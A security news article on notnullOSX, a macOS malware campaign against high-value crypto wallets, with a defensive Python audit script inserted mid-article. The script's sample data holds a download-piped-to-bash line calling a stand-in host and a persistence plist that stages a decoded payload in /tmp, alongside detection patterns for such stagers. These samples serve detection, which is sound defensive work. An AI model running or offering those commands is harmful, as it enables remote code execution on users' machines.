
notnullOSX Malware Targets High-Value Crypto Wallets with Stealthy macOS Attacks

A newly discovered macOS malware strain, known as notnullOSX, is targeting cryptocurrency users with significant holdings, specifically those with wallets exceeding $10,000. Security researchers have identified the threat as a highly focused and evolving attack designed to steal funds and sensitive data from high-value victims.

First detected in late March 2026, the malware has already been observed in multiple regions, including parts of Asia and Europe. Its design reflects a calculated approach, selectively targeting users who are more likely to yield substantial financial returns.

The malware is believed to be developed by a known figure in hacking circles who resurfaced after a period of inactivity and introduced a more advanced, modular tool tailored for macOS systems. This latest version demonstrates a deeper understanding of the platform and modern attack techniques.

The infection process relies heavily on social engineering. Victims are lured through deceptive methods such as fake documents that display error messages, prompting them to take action. In one common scenario, users are instructed to copy and paste a command into the macOS Terminal to resolve a supposed issue. This tactic is particularly effective against developers and crypto users who are accustomed to using command-line tools.

Once executed, the malware requests elevated permissions, including full disk access. Granting this level of access allows it to bypass many built-in macOS protections and access sensitive data such as messages, stored credentials, and personal notes without raising suspicion.

Attackers have also distributed trojanized versions of legitimate applications to further spread the malware. These fake apps are promoted through compromised online platforms, increasing their credibility and reach. After installation, the malware establishes a persistent backdoor, enabling attackers to remotely control the system and deploy additional malicious actions.

One of the most dangerous capabilities of notnullOSX is its ability to target cryptocurrency wallets. It can replace legitimate wallet management applications with malicious versions, tricking users into entering sensitive recovery phrases. This method allows attackers to gain full control over crypto assets, including those stored in hardware wallets if managed through compromised software.
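The three behaviours the article describes (a "paste this into Terminal" lure, a launchd persistence entry for the backdoor, and a wallet application swapped for a malicious copy) all leave traces a defender can check for. The following audit script is an added example written for this page; it is not code from the article or from the researchers who analysed notnullOSX. The command-line heuristics it uses are assumptions drawn from common macOS stager tradecraft, not indicators published for this campaign, the sample history lines and plist are constructed, and `/Applications/YourWallet.app` is a placeholder path.

```python
"""Defensive audit for the tradecraft described above: terminal-paste lures,
launchd persistence, and replaced wallet apps. Example code, not the article's."""
import plistlib
import re
import shutil
import subprocess
from pathlib import Path

# Heuristics for what a pasted "fix" command or a persistence entry tends to run.
# These are assumed generic stager patterns, not indicators from the article.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"curl\b.*\|\s*(ba|z)?sh\b"), "download piped straight into a shell"),
    (re.compile(r"\bbase64\b.*(-d|--decode)"), "base64-decoded payload"),
    (re.compile(r"\bosascript\b"), "AppleScript execution (dialog spoofing / prompts)"),
    (re.compile(r"xattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine"), "quarantine attribute stripped"),
    (re.compile(r"(/tmp|/private/tmp|/var/tmp)/\S+"), "executable staged in a temp directory"),
    (re.compile(r"\bnohup\b|&\s*$"), "detached background execution"),
]


def classify_command(command: str) -> list[str]:
    """Return the reasons a single shell command line looks like a stager."""
    return [reason for pattern, reason in SUSPICIOUS_PATTERNS if pattern.search(command)]


def scan_shell_history(lines) -> list[tuple[str, list[str]]]:
    """Flag history lines (e.g. from ~/.zsh_history) that match the lure heuristics."""
    hits = []
    for raw in lines:
        # zsh extended history prefixes each entry with ': <epoch>:<elapsed>;'
        cmd = raw.split(";", 1)[1] if raw.startswith(": ") and ";" in raw else raw
        reasons = classify_command(cmd.strip())
        if reasons:
            hits.append((cmd.strip(), reasons))
    return hits


def scan_launch_item(plist_bytes: bytes) -> list[str]:
    """Inspect a LaunchAgent/LaunchDaemon plist for persistence that runs a stager."""
    try:
        item = plistlib.loads(plist_bytes)
    except Exception as exc:  # a plist launchd cannot parse is itself worth a look
        return [f"unparseable plist: {exc}"]
    program = item.get("Program")
    parts = ([program] if program else []) + [str(a) for a in item.get("ProgramArguments") or []]
    findings = classify_command(" ".join(parts))
    if item.get("RunAtLoad") and item.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive (restarts if killed)")
    return findings


def audit_launch_dirs(dirs=None) -> dict[str, list[str]]:
    """Walk the usual launchd directories and report items with findings."""
    dirs = dirs or [Path.home() / "Library/LaunchAgents",
                    Path("/Library/LaunchAgents"), Path("/Library/LaunchDaemons")]
    report = {}
    for d in dirs:
        for p in Path(d).glob("*.plist"):
            findings = scan_launch_item(p.read_bytes())
            if findings:
                report[str(p)] = findings
    return report


def verify_app_signature(app_path: str) -> tuple[bool, str]:
    """Run Apple's codesign verifier on a wallet app bundle (macOS only).

    A replaced or tampered bundle fails --verify --deep --strict; a bundle
    signed by someone other than the vendor should also be treated as swapped."""
    if shutil.which("codesign") is None:
        return (False, "codesign not available on this host")
    proc = subprocess.run(["codesign", "--verify", "--deep", "--strict", app_path],
                          capture_output=True, text=True)
    return (proc.returncode == 0, proc.stderr.strip() or "signature valid")


# Constructed sample data (not from the article): one benign history line, one
# lure-style line, and a persistence plist of the kind a backdoor might drop.
SAMPLE_HISTORY = [
    ": 1711000000:0;git status",
    ": 1711000100:0;curl -fsSL https://example.invalid/fix.sh | bash",
]
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/bin/sh", "-c", "echo aGk= | base64 -d > /tmp/.u && nohup /tmp/.u &"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

if __name__ == "__main__":
    for cmd, reasons in scan_shell_history(SAMPLE_HISTORY):
        print("history:", cmd, "->", reasons)
    print("sample plist:", scan_launch_item(SAMPLE_PLIST))
    print("launchd audit:", audit_launch_dirs())
    print("wallet app:", verify_app_signature("/Applications/YourWallet.app"))  # placeholder path
```

Pair the script with a review of which applications hold Full Disk Access under System Settings > Privacy & Security; a wallet or "fix" tool appearing there without a reason you remember granting is the permission-abuse step the article describes.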

The malware is also capable of targeting popular desktop wallets, broadening its impact across different types of cryptocurrency users. Its modular design suggests that it can be updated and expanded over time, making it an ongoing and evolving threat.

Researchers warn that while the current campaign focuses on high-value targets, the underlying techniques could easily be adapted for wider use. The emergence of notnullOSX highlights the growing sophistication of macOS-focused threats and reinforces the need for caution when interacting with unfamiliar files, commands, or software, even on traditionally secure platforms.

1 Comment

  • This malware highlights how attackers are increasingly focusing on high-value cryptocurrency users and using sophisticated social engineering to bypass even macOS security protections. The use of fake apps, terminal commands, and permission abuse shows that user behavior remains one of the weakest security links. It reinforces the importance of verifying software sources, avoiding unknown terminal commands, and protecting crypto assets with trusted, verified tools only.

